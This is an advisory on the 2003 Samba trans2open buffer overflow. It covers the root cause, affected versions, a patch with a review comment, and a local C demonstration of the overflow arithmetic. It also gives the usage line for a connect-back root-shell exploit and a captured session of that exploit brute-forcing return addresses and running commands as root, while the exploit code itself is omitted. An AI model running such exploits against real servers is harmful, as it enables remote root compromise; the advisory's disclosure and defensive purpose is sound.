COMMAND

Samba remote buffer overflow

SYSTEMS AFFECTED

Samba 2.2 prior to 2.2.8a
Samba 2.0 up to and including 2.0.10
Samba-TNG prior to 0.3.2

PROBLEM

A remote root buffer overflow was found by Digital Defense, Inc. while sniffing strange traffic. As described in Digital Defense, Inc. Security Advisory DDI-1013 [http://www.digitaldefense.net/]:

An anonymous user can gain remote root access due to a buffer overflow caused by a StrnCpy() into a char array (fname) using a non-constant length (namelen).

StrnCpy(fname,pname,namelen); /* Line 252 of smbd/trans2.c */

In the call_trans2open function in trans2.c, the Samba StrnCpy function copies pname into fname using namelen. The variable namelen is assigned the value of strlen(pname)+1, which causes the overflow. The variable 'fname' is a _typedef_ pstring, which is a char array of size 1024. If pname is greater than 1024, you can overwrite almost anything you want past the 1024th byte that fits inside of sizeof(pname), or the value returned by SVAL(inbuf,smbd_tpscnt) in function reply_trans2(), which should be around 2000 bytes.

Forced Release
==============

This vulnerability is being actively exploited in the wild. Digital Defense, Inc. discovered this bug by analyzing a packet capture of an attack against a host running Samba 2.2.8. The attack captured was performed on April 1st, 2003. Samba users are urged to check their Samba servers for signs of compromise. Samba and Digital Defense, Inc. decided to release their advisories before all vendors had a chance to update their packages because this vulnerability is being actively exploited.

Exploit
=======

Because of an explicit no-copy notice, the Digital Defense exploit is not attached here (see below for another one). From the advisory:

An exploit named trans2root.pl has been posted on the Digital Defense, Inc. website. A quick UDP-based scanner named nmbping.pl has also been posted to assist you in identifying Samba servers on your network.
Both are available for download from the following URL:

http://www.digitaldefense.net/labs/securitytools.html

This exploit works against all distributions listed in the testing environment section. Usage is as follows:

trans2root.pl <options> -t <target type> -H <your ip> -h <target ip>

This exploit should work against all x86 Linux, Solaris, and FreeBSD hosts running the 2.2.x branch of Samba. Hosts with a non-executable stack are not vulnerable to this particular exploit. The exploit will cause the target host to connect back to the host running the exploit and spawn a root shell on the defined port (default is 1981).

The scanner is very easy to use, and should detect and identify Samba and Windows SMB services. Usage is as follows:

nmbping.pl <network/cidr>

Update 10 apr.
==============

noir sin [noir(at)olympos(dot)org] posted the following exploit:

0day is fragile! one day it's your precious, next day it's worthless ... anyways i put together this SAMBAExploit class in python which might be interesting for folks since it's reusable in many other stuff ... python cause; write once a heap, stack or fmt string exploit class and the rest is just to "cp old_exp.py new_exp.py; vi new_exp.py"

exploit bruteforces all possible stack range and dups the already connected socket for spawning the shell

greets to: Michael Teo for pysmb, lsd-pl for linux/findsck shellcode

- noir

noir@juneof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132
[*] brute forcing well known addr range ...
[*] trying; retaddr: 0xbffed404
trying; retaddr: 0xbffed504
trying; retaddr: 0xbffed604
trying; retaddr: 0xbffed704
Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown
cat /etc/redhat-rel*
Red Hat Linux Advanced Server release 2.1AS (Pensacola)
id
uid=0(root) gid=0(root) groups=99(nobody)
exit
*** Connection closed by remote host ***

Exploit code
============

[The uuencoded archive trans2open.tgz (noir's samba_exp.py) that followed here is not reproduced: it is a binary attachment, and this copy of it is incomplete.]

SOLUTION

Upgrading to the latest version of Samba or Samba-TNG is the recommended solution to this vulnerability. Samba version 2.2.8a and Samba-TNG version 0.3.2 are not vulnerable. There will be no new releases for the 2.0 line of Samba code. The only fix for Samba 2.0 is to apply the patches that Samba is providing.
A workaround in the current source code for this specific vulnerability would be to modify the StrnCpy line found at line 250 in smbd/trans2.c in the Samba 2.2.8 source code:

-StrnCpy(fname,pname,namelen);
+StrnCpy(fname,pname,MIN(namelen, sizeof(fname)-1));

As a result of this vulnerability being identified, at least three others have also been found by the Samba team after reviewing similar usages in the source tree. One is a static overflow and the other two are heap overflows. Applying the fix above will only protect against the specific problem identified in this advisory. To fully protect yourself, you must apply the patches from Samba, or upgrade to 2.2.8a.

Samba is available for download from: http://www.samba.org/

Samba-TNG is available for download from: http://www.samba-tng.org/
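Review bot: the bound MIN(namelen, sizeof(fname)-1) is only right because fname is the local pstring array in call_trans2open, so sizeof(fname) is the 1024-byte array size; if this copy is ever moved into a helper that receives fname as a char *, sizeof(fname) silently becomes the pointer size and the bound is wrong, so a comment on the line (or using sizeof(pstring)-1) would make the dependency explicit. The -1 is what keeps StrnCpy's terminating NUL inside the array, so it must not be dropped as cosmetic. Note also that the patched line truncates an oversized name and then continues the open on a path the client did not ask for; rejecting the request when namelen >= sizeof(fname) would be the safer behaviour, and, as the surrounding text says, this one-line change leaves the three related overflows found by the Samba team untouched.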
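To make the arithmetic in the PROBLEM section and the workaround above concrete, here is an added example; it is not code from the advisory or from Samba. It reimplements StrnCpy with the semantics Samba documents for it (assumed here: copy at most n bytes, then always write a terminating NUL, so a call with n may touch n+1 bytes), builds a constructed client name of 'A' bytes, runs the copy into a pstring placed in front of sentinel bytes that stand in for whatever follows fname on smbd's stack, and counts how many bytes past fname get overwritten, first with namelen computed as in the vulnerable code and then bounded as in the workaround. The buffer layout, the sentinel and the helper names are assumptions for the demonstration; nothing here talks to a server, and the copy never leaves the scratch buffer, so the demonstration itself is well-defined C.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Samba's pstring: a fixed 1024-byte char array (the typedef lives in Samba's include/smb.h). */
#define PSTRING_LEN 1024
typedef char pstring[PSTRING_LEN];

#ifndef MIN
#define MIN(a, b) ((a) < (b) ? (a) : (b))
#endif

/* Reimplementation of Samba's StrnCpy (assumption: strncpy-like, but it always NUL-terminates,
 * so with length n it may write n + 1 bytes into dest). That extra byte is the reason the
 * workaround bounds namelen with sizeof(fname) - 1 rather than sizeof(fname). */
static char *StrnCpy(char *dest, const char *src, size_t n)
{
    char *d = dest;
    if (!dest)
        return NULL;
    if (!src) {
        *dest = 0;
        return dest;
    }
    while (n-- && (*d++ = *src++))
        ;
    *d = 0;
    return dest;
}

/* Scratch region: a pstring at the front, sentinel bytes behind it. The sentinel plays the role
 * of saved registers and the return address that sit after fname on the real stack. */
#define SCRATCH_LEN 4096
#define SENTINEL 0xAA

/* Run the call_trans2open copy with an attacker-chosen name of name_len bytes and return how
 * many bytes past the end of the pstring were overwritten. apply_fix == 0 uses namelen exactly
 * as the vulnerable code does; apply_fix != 0 bounds it the way the workaround does. */
static size_t trans2open_overflow_bytes(size_t name_len, int apply_fix)
{
    static char scratch[SCRATCH_LEN];
    static char pname[SCRATCH_LEN];
    size_t namelen, i, clobbered = 0;
    char *fname = scratch;               /* stands in for `pstring fname` in call_trans2open */

    if (name_len > SCRATCH_LEN - 16)     /* keep even the unpatched worst case inside scratch */
        name_len = SCRATCH_LEN - 16;

    memset(scratch, SENTINEL, sizeof(scratch));
    memset(pname, 'A', name_len);        /* constructed input: the path the client sends */
    pname[name_len] = '\0';

    namelen = strlen(pname) + 1;         /* as computed in smbd/trans2.c */
    if (apply_fix)
        namelen = MIN(namelen, sizeof(pstring) - 1);   /* the advisory's workaround */

    StrnCpy(fname, pname, namelen);

    /* Every byte after the pstring that no longer holds the sentinel was overwritten. */
    for (i = PSTRING_LEN; i < sizeof(scratch); i++)
        if ((unsigned char)scratch[i] != SENTINEL)
            clobbered++;
    return clobbered;
}

int main(void)
{
    size_t lens[] = { 1022, 1023, 2000 };   /* 2000 is about the smb_tpscnt limit the advisory cites */
    size_t k;
    for (k = 0; k < sizeof(lens) / sizeof(lens[0]); k++)
        printf("name of %4zu bytes: unpatched overwrites %4zu bytes past fname, patched overwrites %zu\n",
               lens[k], trans2open_overflow_bytes(lens[k], 0), trans2open_overflow_bytes(lens[k], 1));
    return 0;
}
```

Compile with `cc -std=c99` and run it: a 2000-byte name overwrites 978 bytes beyond fname unpatched and none patched. The 1023-byte case is the one worth noticing: the name itself fits, but the terminator StrnCpy appends lands one byte past the array, which is exactly the byte the `-1` in the workaround accounts for.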